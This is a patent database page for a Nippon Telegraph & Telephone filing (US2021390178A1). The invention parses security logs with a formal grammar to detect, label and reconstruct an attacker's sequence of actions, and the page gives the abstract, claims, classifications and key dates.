PatentsDB

Information processing device and information processing program

US2021390178A1 · US · A1

Patent metadata
FieldValue
Publication numberUS-2021390178-A1
Application numberUS-201917283552-A
CountryUS
Kind codeA1
Filing dateMay 20, 2019
Priority dateOct 10, 2018
Publication dateDec 16, 2021
Grant date

How to read this patent

A practical reading order for non-experts. Skip the full description unless you need deep technical detail.

  1. Title

    What the patent document calls the invention.

  2. Abstract

    A short plain-language summary of the technical disclosure.

  3. Assignees and inventors

    Who owns or filed the patent and who is credited as inventor.

  4. Key dates

    Filing, priority, publication, and grant dates set the timeline.

  5. First independent claim

    The legal scope of protection — read this for what is actually claimed.

  6. CPC / IPC classifications

    Technology tags used to group this patent with similar filings.

  7. Citations and related patents

    Prior art links and similar publications in this corpus.

Abstract

Official abstract text for this publication.

An information processing device includes an element extraction unit that extracts elements relating to actions of an attacker from each input log, a generation unit that generates a parser based on definition information defining the actions of the attacker in a formal grammar, the parser detecting, from a log, a log string having a feature corresponding to an action defined by the definition information, a parsing unit that detects, from a log consisting of the elements extracted by the element extraction unit, log strings having features corresponding to the actions defined by the definition information by using the parser, and a reconstruction unit that reconstructs the log strings detected by the parsing unit, adds a label indicating an action defined by the definition information to each of the reconstructed log strings, and outputs the labeled log strings as a log corresponding to a series of actions of the attacker.

First claim

Opening claim text (preview).

1 . An information processing device comprising: a memory; and a processor coupled to the memory and programmed to execute a process comprising: extracting elements relating to actions of an attacker from each input log; generating a parser based on definition information that defines the actions of the attacker in a formal grammar, the parser being configured to detect, from a log, a log string having a feature corresponding to an action defined by the definition information; detecting, from a log consisting of the elements extracted by the extracting, log strings having features corresponding to the actions defined by the definition information by using the parser; and reconstructing the log strings detected by the detecting, add a label indicating an action defined by the definition information to each of the reconstructed log strings, and output the labeled log strings as a log corresponding to a series of actions of the attacker. 2 . The information processing device of claim 1 , wherein the definition information is described in a formal grammar dealing with an element as a terminal symbol. 3 . The information processing device of claim 1 , wherein the definition information includes information indicating an order of the actions of the attacker, and the reconstructing disposes the labeled log strings in the order indicated by the definition information and outputs the log as a log corresponding to a series of actions of the attacker. 4 . A computer-readable recording medium having stored therein an analysis program for causing a computer to execute a process comprising: a step of extracting elements relating to actions of an attacker from each input log; a step of generating a parser based on definition information that defines the actions of the attacker in a formal grammar, the parser being configured to detect, from a log, a log string having a feature corresponding to an action defined by the definition information; a step of detecting, from a log consisting of the elements extracted at the step of extracting the elements, log strings having features corresponding to the actions defined by the definition information by using the parser; and a step of reconstructing the log strings detected at the step of detecting the log strings, adding a label indicating an action defined by the definition information to each of the reconstructed log strings, and outputting the labeled log strings as a log corresponding to a series of actions of the attacker.

Assignees

Inventors

Classifications

  • G06F21/552Primary

    involving long-term monitoring or reporting · CPC title

  • G06F2221/034

    Test or assess a computer or a system · CPC title

  • G06F40/205

    Parsing · CPC title

  • G06F21/55Primary

    Detecting local intrusion or implementing counter-measures · CPC title

  • H04L63/1425

    Traffic logging, e.g. anomaly detection · CPC title

Patent family

Related publications grouped by family.

View patent family 70164211

External sources

Frequently asked questions

Answers are generated from the same data shown on this page.

What does patent US2021390178A1 cover?
An information processing device includes an element extraction unit that extracts elements relating to actions of an attacker from each input log, a generation unit that generates a parser based on definition information defining the actions of the attacker in a formal grammar, the parser detecting, from a log, a log string having a feature corresponding to an action defined by the definition …
Who is the assignee on this patent?
Nippon Telegraph & Telephone
What technology area does this patent fall under?
Primary CPC classification G06F21/552. Mapped technology areas include Physics.
When was this patent published?
Publication date Thu Dec 16 2021 00:00:00 GMT+0000 (Coordinated Universal Time) (A1). Legal status and post-grant events are not shown on this page.
What related patents are in patentsdb?
We list 8 related publications on this page (citations in our corpus or others sharing the same primary CPC).